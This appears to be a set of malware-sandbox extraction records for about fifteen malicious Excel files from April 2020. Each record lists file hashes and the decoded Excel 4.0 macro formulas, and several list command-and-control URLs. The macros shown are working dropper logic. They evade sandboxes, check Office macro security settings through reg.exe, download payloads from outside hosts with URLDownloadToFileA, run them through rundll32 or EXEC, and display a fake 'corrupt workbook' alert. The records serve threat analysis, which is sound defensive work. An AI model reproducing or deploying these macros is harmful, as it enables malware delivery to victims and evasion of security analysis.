{"version":"0.2","sample":{"sample":"","kind":"file","target":"b91e4c22a9f784cb9ef43fd751d1a854084fe984f9dd268121c88aab014b7ee9"},"analysis":{"reported":"2020-04-09T16:18:32Z","score":10},"files":[{"filename":"b91e4c22a9f784cb9ef43fd751d1a854084fe984f9dd268121c88aab014b7ee9","filesize":167936,"md5":"8d6803192f95c80fb09b0c188c17f53d","sha1":"a1ed6b7bf8577863ba34df6093ab6148227f735d","sha256":"b91e4c22a9f784cb9ef43fd751d1a854084fe984f9dd268121c88aab014b7ee9","sha512":"88c1b98ceea63ee258c36d30d5dec7ff3be67fd58ea85f94fdb95401948d15e2b719b25b0210f58f61dfb1663438ecbb04cf67330b2d3d97aef6dfe5b96068f7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b91e4c22a9f784cb9ef43fd751d1a854084fe984f9dd268121c88aab014b7ee9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"QqsZb3JTgo\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b91ef61e617ccdf778a2f5609153213fcb4f27b5b23e0915208531cb7d251168"},"analysis":{"reported":"2020-04-09T16:18:32Z","score":10},"files":[{"filename":"b91ef61e617ccdf778a2f5609153213fcb4f27b5b23e0915208531cb7d251168","filesize":167936,"md5":"4bfc4d429a7dc748c54c813e7b72b51e","sha1":"8762fa742e05e01ff44a4540faa004f7fbe43dee","sha256":"b91ef61e617ccdf778a2f5609153213fcb4f27b5b23e0915208531cb7d251168","sha512":"52b8e56e7739cdf8f0041b9ecdb6af7bc1094291f7a529a15ff28a39f36941f44b80096b5cab50b1a07c2dbda30d35016f15c1ef1d9877f3316468bad51abe21","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b91ef61e617ccdf778a2f5609153213fcb4f27b5b23e0915208531cb7d251168.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"YtnHooS1fe\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b92adec08dbb4319b81fc0884a9c497b6ae78a013a9405aaee7b70a7a8900725"},"analysis":{"reported":"2020-04-09T16:18:32Z","score":10},"files":[{"filename":"b92adec08dbb4319b81fc0884a9c497b6ae78a013a9405aaee7b70a7a8900725","filesize":113664,"md5":"ec74d3cc3d1b4ea32b5ac7c6bce56d96","sha1":"6a10776607f1817416155bb51ba572447e4d165d","sha256":"b92adec08dbb4319b81fc0884a9c497b6ae78a013a9405aaee7b70a7a8900725","sha512":"854ecb491898ff2425396290244a608b861ac38c814abb7b29be331360c05bc41e5c90235e02b301fc44cd66a2dddae42feae411c4c97ccb9d1df523e180e190","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b92adec08dbb4319b81fc0884a9c497b6ae78a013a9405aaee7b70a7a8900725.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"c2LuABmVLb\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b947c804b50f0e00aca942a5f232874cc95e827beac05b96462eacd08671a8e5"},"analysis":{"reported":"2020-04-09T16:18:33Z","score":10},"files":[{"filename":"b947c804b50f0e00aca942a5f232874cc95e827beac05b96462eacd08671a8e5","filesize":182784,"md5":"74fa88c5fcd97bde42c7bc94b54f4d88","sha1":"10bce3d8196f7d8b5457b97c8a00bce69dde0710","sha256":"b947c804b50f0e00aca942a5f232874cc95e827beac05b96462eacd08671a8e5","sha512":"3cdd95307a5bea9b39f129cbcd1b09c1095a110fd8552188453d518709bcfb821b0e095ccd24e20dc5e122bf344913deedd4d15a51d105f4ef7930ccf4cf9086","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b947c804b50f0e00aca942a5f232874cc95e827beac05b96462eacd08671a8e5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://g2creditsolutions.com/trusty/444444.png","http://lorrainehomeconsulting.com/wp-content/uploads/2020/02/trusty/187213.png"],"attr":{"formulas":"ERROR(FALSE)\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://g2creditsolutions.com/trusty/444444.png\",\"c:\\Users\\Public\\1.exe\",0,0)\nIF(R$1C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://lorrainehomeconsulting.com/wp-content/uploads/2020/02/trusty/187213.png\",\"c:\\Users\\Public\\1.exe\",0,0),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\1.exe\")\nCLOSE(FALSE)\nWORKBOOK.HIDE(\"SDJKv3\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b97c2b61e47801dddde5786b518d7a16b458e49d507b1908cdc1722be4eaf7cf"},"analysis":{"reported":"2020-04-09T16:18:33Z","score":10},"files":[{"filename":"b97c2b61e47801dddde5786b518d7a16b458e49d507b1908cdc1722be4eaf7cf","filesize":170496,"md5":"ac2328043d67f4669194d1a4db8ab8a6","sha1":"5f4ee0588fdfc1da0336accae730fa2104934282","sha256":"b97c2b61e47801dddde5786b518d7a16b458e49d507b1908cdc1722be4eaf7cf","sha512":"c914b3d7ab0e6c6535fc06a5b7bfea580f1d4e48e2fc0dad730df7e6ac4751c8324ee0e57bb51d5cf38e2a38499431ba59e6d975b4d4d30bc31edb0706792629","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b97c2b61e47801dddde5786b518d7a16b458e49d507b1908cdc1722be4eaf7cf.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"6goHRVSdhA\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b97ecbb4eabcf5789b38ebfc29bdea0be61582a5baa56d2a645e9b774ada6693"},"analysis":{"reported":"2020-04-09T16:18:33Z","score":10},"files":[{"filename":"b97ecbb4eabcf5789b38ebfc29bdea0be61582a5baa56d2a645e9b774ada6693","filesize":206336,"md5":"03b4be7d818e6b1b05b422d05e5af862","sha1":"de34e6c73eb48fc03c2a4df3a7deeacaca6632b7","sha256":"b97ecbb4eabcf5789b38ebfc29bdea0be61582a5baa56d2a645e9b774ada6693","sha512":"a27a5358c55cfc14cf49645dcfa723821131251fd4bec4afe9b98436e508bc638ce6eaebbe2f506b9f9ff6113a096e400aeee654da8767ca56b3c46db16faf2c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b97ecbb4eabcf5789b38ebfc29bdea0be61582a5baa56d2a645e9b774ada6693.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"MOy0wEyb72\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b987dddebf5b274e4f6c9a1aea1649989f0cff0cfe5c23fc39f7c0a1be7e69ca"},"analysis":{"reported":"2020-04-09T16:18:33Z","score":10},"files":[{"filename":"b987dddebf5b274e4f6c9a1aea1649989f0cff0cfe5c23fc39f7c0a1be7e69ca","filesize":219136,"md5":"dab3920e8075fd8167c4bfc6026009dd","sha1":"aaa6ee90effe975f8aca2b2f46a19610e67f48f6","sha256":"b987dddebf5b274e4f6c9a1aea1649989f0cff0cfe5c23fc39f7c0a1be7e69ca","sha512":"7f3ba10e79af4d2abd6fcb9a5439a03880e6e748a690009a372b967672eb307092ee206a38c430d3d3540f7dbc5b7eb91d31211f6b73cf5d7968ac392f462459","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b987dddebf5b274e4f6c9a1aea1649989f0cff0cfe5c23fc39f7c0a1be7e69ca.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://kacper-formela.pl/wp-smart.php","http://braeswoodfarmersmarket.com/wp-smart.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://kacper-formela.pl/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://braeswoodfarmersmarket.com/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bqg85ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"BUzKdTjrdd\",TRUE)\nGOTO(R$1C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b9963bd0f0b2afeb9ff4b65bdbb5ea996c3aad868ca22ba6af3986a0ae0a2f11"},"analysis":{"reported":"2020-04-09T16:18:33Z","score":10},"files":[{"filename":"b9963bd0f0b2afeb9ff4b65bdbb5ea996c3aad868ca22ba6af3986a0ae0a2f11","filesize":142848,"md5":"8c9ecf621af510c96a30e9c79faec101","sha1":"2e2d0a1a85a15c7feb8a2c388a0e483c863b694e","sha256":"b9963bd0f0b2afeb9ff4b65bdbb5ea996c3aad868ca22ba6af3986a0ae0a2f11","sha512":"7a9ec0615259b44b867dcffd31a3d0e1a41925d75fbcafdfadda1c0ca3188a22812bcd5748b208247c2e4c1773f65bac4578a0aaa1a1d2cd3e17b21b03223b89","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b9963bd0f0b2afeb9ff4b65bdbb5ea996c3aad868ca22ba6af3986a0ae0a2f11.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/fsgbfgbfsg43"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"dCcUBiDVDC\",TRUE)\nRETURN()\nRETURN()\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$20C$11\u003c770,CLOSE(FALSE),)\nIF(R$21C$11\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b99d8de19ebd8efac847949ffdc62abb735781ed25e81f3591fe205e40fd01ff"},"analysis":{"reported":"2020-04-09T16:18:33Z","score":10},"files":[{"filename":"b99d8de19ebd8efac847949ffdc62abb735781ed25e81f3591fe205e40fd01ff","filesize":209920,"md5":"35d8f076cf38573a4f7e64259bd1989a","sha1":"1092ba73a1d6089f2d4594fe25f0516eddd4d884","sha256":"b99d8de19ebd8efac847949ffdc62abb735781ed25e81f3591fe205e40fd01ff","sha512":"340bf4f397a29e10c44344f35a8f914e5af478463839dba805c0ee435d560ece941510bca4c60f3a6532910eafacc1db5d87bfeaf7096691501d875857adbadf","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b99d8de19ebd8efac847949ffdc62abb735781ed25e81f3591fe205e40fd01ff.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"K9ct4kCksB\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b9b18d522c2bbb9d9157570d4ffc6500e4695197f25351058dd1958a176d0aae"},"analysis":{"reported":"2020-04-09T16:18:33Z","score":10},"files":[{"filename":"b9b18d522c2bbb9d9157570d4ffc6500e4695197f25351058dd1958a176d0aae","filesize":104448,"md5":"94142297d82498d3f598df722220289e","sha1":"ae916ac51603f73f7573c745e30ac97f3cb214a2","sha256":"b9b18d522c2bbb9d9157570d4ffc6500e4695197f25351058dd1958a176d0aae","sha512":"67c99d936c3bd4c4d52a61eb6059926a2565618368a782b3877adfc821a05fc9b987cf97fda964fabd0e4efb2b84b95e27485d6486ad54a517a1b5a7076c8514","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b9b18d522c2bbb9d9157570d4ffc6500e4695197f25351058dd1958a176d0aae.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"ePTDtcVFbS\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b9b3a307b8bbbd944d5a8a908ac0118ab64cc371d64e3f934c5cdd1df667b528"},"analysis":{"reported":"2020-04-09T16:18:33Z","score":10},"files":[{"filename":"b9b3a307b8bbbd944d5a8a908ac0118ab64cc371d64e3f934c5cdd1df667b528","filesize":221184,"md5":"f995b84a1182d4cb11fbfccade8b53ee","sha1":"0711f53f73d1723af7e8c656331ca3b595d42140","sha256":"b9b3a307b8bbbd944d5a8a908ac0118ab64cc371d64e3f934c5cdd1df667b528","sha512":"4dda848a36bff7d0db62604dc5fa31cde52214071b8edc0d38ce1e83989b20d15a5ea2da8090cd0b7dedbe84fa21561a1bf9887804fb757b4dbaef9f87e49fd2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b9b3a307b8bbbd944d5a8a908ac0118ab64cc371d64e3f934c5cdd1df667b528.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"S0kmOpuAAT\",TRUE)\nGOTO(R$3C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b9b51fbcaa2856dbb8cbd76af8896e19d113246b15ee1873e811093d42814ac1"},"analysis":{"reported":"2020-04-09T16:18:33Z","score":10},"files":[{"filename":"b9b51fbcaa2856dbb8cbd76af8896e19d113246b15ee1873e811093d42814ac1","filesize":112128,"md5":"ab0752c954114680bae6c9fd34c31c37","sha1":"889f3f3eb2f2adfe1389be7fa5c36d0ece9680ba","sha256":"b9b51fbcaa2856dbb8cbd76af8896e19d113246b15ee1873e811093d42814ac1","sha512":"23919698aa76031db328ce20678f5c4c0e8d14aa0060c5859c0b66e2e2ed54632c59fad88ecc54fc767781b78a4f35cb87bf3724bb60fa5ca39c220d103d9e7e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b9b51fbcaa2856dbb8cbd76af8896e19d113246b15ee1873e811093d42814ac1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b9c1852d1cd025459cc571cab453eaa61630313b7d0dd38fe03510fbc8c3e83c"},"analysis":{"reported":"2020-04-09T16:18:33Z","score":10},"files":[{"filename":"b9c1852d1cd025459cc571cab453eaa61630313b7d0dd38fe03510fbc8c3e83c","filesize":185344,"md5":"9a1007141b8e143e4521a6b80333fe24","sha1":"d1b6db60d0ef2df82e4fbf32ab066899cf12d33f","sha256":"b9c1852d1cd025459cc571cab453eaa61630313b7d0dd38fe03510fbc8c3e83c","sha512":"d423e42ec6162c345cda0bd3249f7ff3e6387cad4fb178e1b9515471d8d67fd8bad11ba98af9f418fe8d7279abac107b93d83f9fcbe57b2e5f09fc98cb5f8a2b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b9c1852d1cd025459cc571cab453eaa61630313b7d0dd38fe03510fbc8c3e83c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b9dbe8b5f17d8ac60ae6777e6101b6d591a10540e30bbcaa7d68d9f1df6a1a70"},"analysis":{"reported":"2020-04-09T16:18:33Z","score":10},"files":[{"filename":"b9dbe8b5f17d8ac60ae6777e6101b6d591a10540e30bbcaa7d68d9f1df6a1a70","filesize":206336,"md5":"b7eeb014015a06aa62a59f3fb12034c0","sha1":"0abf39c6cc765539a6304cdca9a3e2aa54b693f7","sha256":"b9dbe8b5f17d8ac60ae6777e6101b6d591a10540e30bbcaa7d68d9f1df6a1a70","sha512":"e474cf5a8a23f1038f304e9e1f7342a977bd2d8f4a737d7abecc6f4e23cc0d056f999fdec733748f58c90b3ffef04c18d4eed7b666146efce4188ef4dd7668dd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b9dbe8b5f17d8ac60ae6777e6101b6d591a10540e30bbcaa7d68d9f1df6a1a70.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"jJ4LvjJAhj\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b9e837f1b64f91ee0bfba4a62cb34681a267051efc350d33252632f3a6ddf809"},"analysis":{"reported":"2020-04-09T16:18:33Z","score":10},"files":[{"filename":"b9e837f1b64f91ee0bfba4a62cb34681a267051efc350d33252632f3a6ddf809","filesize":146944,"md5":"7dc347ce53f99dbb02b043041a4e84fc","sha1":"6be05ce74e2fbf3610513601ffb7b3c96005172a","sha256":"b9e837f1b64f91ee0bfba4a62cb34681a267051efc350d33252632f3a6ddf809","sha512":"6e72129a97e4ef66518d6f260fc553d3ed50526cb09dad7af91752cef75ebb8d773b0a0fc49e47858650116f613ee186066a393a27424eae6bb80720858d96f2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b9e837f1b64f91ee0bfba4a62cb34681a267051efc350d33252632f3a6ddf809.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/ckjbvkf732"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"hEjd4IYAi0\",TRUE)"}}}]}
